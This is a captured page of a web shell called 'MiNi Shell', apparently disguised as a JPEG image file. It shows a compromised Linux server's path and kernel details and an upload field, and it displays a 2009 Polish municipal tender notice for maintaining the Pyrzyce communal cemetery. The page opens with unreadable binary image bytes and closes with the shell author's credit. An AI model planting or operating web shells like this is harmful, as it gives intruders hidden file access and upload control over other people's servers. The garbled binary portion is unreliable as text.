JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/96558-N-2009.html

<p class="kh_header"><b>Pyrzyce: Administrowanie cmentarzem komunalnym w Pyrzycach</b><br>
<b>Numer ogłoszenia: 96558 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyrzyce , Plac Ratuszowy 1, 74-200 Pyrzyce, woj. zachodniopomorskie, tel. (091) 570 10 20, faks (091) 570 01 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pyrzyce.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie cmentarzem komunalnym w Pyrzycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a) zbieranie odpadów z alejek cmentarza, terenów zielonych oraz przyległych do ogrodzenia po stronie zewnętrznej w odległości ok. 2 m, usuwanie roślinności z ciągów komunikacyjnych na terenie cmentarza, obmiatanie;
b) organizacja odbioru odpadów z terenu cmentarza, systematyczne wywożenie odpadów zgromadzonych na terenie cmentarza oraz składanych przez użytkowników grobów w wyznaczonych miejscach, na wysypisko komunalne o uregulowanym statusie prawnym oraz ustawienie w miejscach uzgodnionych z Zamawiającym wystarczającej liczby pojemników na odpady (tj. eliminującej występowanie problemu przepełnionych pojemników na odpady)
c)  wywóz nieczystości ciekłych z szamba
d) zimowe utrzymanie cmentarza , w tym: odśnieżanie ciągów komunikacyjnych, likwidowanie śliskości na ciągach komunikacyjnych w sposób nie powodujący zakłóceń w ruchu pieszych oraz umożliwiający swobodny dostęp do miejsc pochówku;
e)  zapewnienie sprawności ujęć wody, pomp, utrzymanie ogrodzenia w należytym stanie technicznym (m.in. naprawa drobnych uszkodzeń, uzupełnianie ubytków itp.),                 a także utrzymywanie sprawności kłódek, zamków i klamek. Utrzymanie tabliczek               z oznaczeniem kwater i tablic informacyjnych. Koszty poboru wody będzie ponosił Zamawiający;
f)  gospodarowanie zielenią (trawniki, krzewy, żywopłoty), obejmujące w szczególności koszenie trawników, przycinkę korekcyjną drzew krzewów ( 40 szt. rocznie) i żywopłotów, usuwanie posuszu, wiatrołomów, odrostów korzeniowych oraz ochrona mienia komunalnego znajdującego się na terenie cmentarza oraz na terenie przyległym do cmentarza (tj. zabezpieczenie powierzonego mienia przed kradzieżą, aktami wandalizmu i dewastacją, nadzorowanie czynności prowadzonych na terenie cmentarza przez inne podmioty gospodarcze, bieżące zgłaszanie szkód odpowiednim organom);
g)   otwieranie i zamykanie bram i bramek cmentarza zgodnie z Regulaminem 
      korzystania z cmentarza komunalnego w Pyrzycach;
h)  bieżący nadzór oraz informowanie o przestrzeganiu przez użytkowników  
     Regulaminu korzystania z cmentarza komunalnego w Pyrzycach;
i)  przygotowywanie, ustalanie i wyznaczanie kwater i alejek ;
j)  nadzór nad obiektem i mieniem Domu Pogrzebowego;
k) prowadzenie ksiąg cmentarnych i archiwalnych oraz prowadzenie korespondencji         z osobami, które nie opłacają miejsc lub zajmują je niezgodnie z obowiązującymi         w tym zakresie przepisami prawa;
l) ubezpieczenie cmentarza od odpowiedzialności cywilnej deliktowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 93.71.11.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 2 800 zł (słownie: dwa  tysiące osiemset złotych ) w jednej z
wymienionych form:
1)pieniądza (złotych polskich)- poleceniem przelewu na konto Zamawiającego  nr 07 2030 0045 1110 0000 0112 5470 lub w Kasie Urzędu Miejskiego, przy czym w dniu otwarcia oferty kwota wadium musi być w dyspozycji Zamawiającego,
2)gwarancji bankowej, mającej ważność zgodną z terminem związania z ofertą
3)poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, mającego ważność jak w ppkt. 2
4)gwarancji ubezpieczeniowej mającej ważność jak w ppkt. 2
5)poręczenia udzielonego przez podmiot, o którym mowa w art. 6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, mającego ważność jak w ppkt.2
9.2. Kserokopię dowodu wniesienia wadium, potwierdzona przez Wykonawcę za zgodność z oryginałem należy dołączyć trwale do oferty przetargowej.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 oraz którzy nie podlegają wykluczeniu na podstawie art. 24 ust.1 i ust.2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
Ocena spełnienia w.w. warunków nastąpi na podstawie złożonych przez Wykonawcę
dokumentów, wymienionych w pkt.6 ust.6 ppkt 1,2,3,4,5,6,7,8,9,10,11,12,13, SWIZ które muszą potwierdzić m.in. spełnienie następujących minimalnych warunków:
a) Wykonawca musi dysponować odpowiednimi uprawnieniami i praktyką zawodową w zakresie zamówienia oraz posiadać aktualny wpis do Ewidencji Działalności   Gospodarczej lub KRS,
b) Wykonawca musi dysponować sprzętem i środkami technicznymi do realizacji zadania,
c) Wykonawca musi posiadać licencję zawodową w zakresie zarządzania nieruchomościami,o której mowa w art 184 ustawy o gospodarce nieruchomościami z dnia 21 sierpnia 1997 roku lub umowę z osobą, która posiada stosowne uprawnienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty (prosimy o zachowanie następującej kolejności ułożenia dokumentów w ofercie) :
1)spis treści
2)formularz oferty wg załącznika nr nr 5,
3)ofertę sporządzoną zgodnie z załącznikiem nr 1,
4)umowy regulujące współpracę podmiotów występujących wspólnie wraz z pisemnym ustanowieniem pełnomocnika do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego - jeżeli występują, w przypadku planowanych podwykonawców należy dołączyć umowę (np. przedwstępna),
5)aktualny odpis z właściwego Krajowego Rejestru Sądowego lub aktualne zaświadczenie z ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)zaświadczenie z właściwego Urzędu Skarbowego i ZUS o nie zaleganiu z opłacaniem podatków i opłat oraz składek na ubezpieczenia społecznie i zdrowotne albo zaświadczenie o uzyskaniu zgody na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 1 miesiąc przed upływem okresu składania ofert,
7)oświadczenie wg załącznika nr 2,
8)oświadczenie wg załącznika nr 5,
9)oświadczenie wg załącznika nr 6,
10)charakterystykę firmy wg załącznika nr 3
11)wykaz wg załącznika nr 3a, w którym należy podać wykonane podobne prace w zakresie zarządzania nieruchomościami w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywane podobne prace stanowiące przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, wraz z dołączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,
12)polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
13)licencje zawodową w zakresie zarządzania nieruchomościami lub umowę zawartą z osobą, która posiada stosowne uprawnienia,
14)potwierdzenie wpłacenia wadium
15)dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pyrzyce.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Ratuszowy 1
74-200 Pyrzyce
pok.269 II pietro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 09:30, miejsce: sekretariat Urzędu Miejskiego w Pyrzycach 74-200 Pyrzyce Plac Ratuszowy 1 ,    
w terminie do dnia 22.04.2009. do godz. 9:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com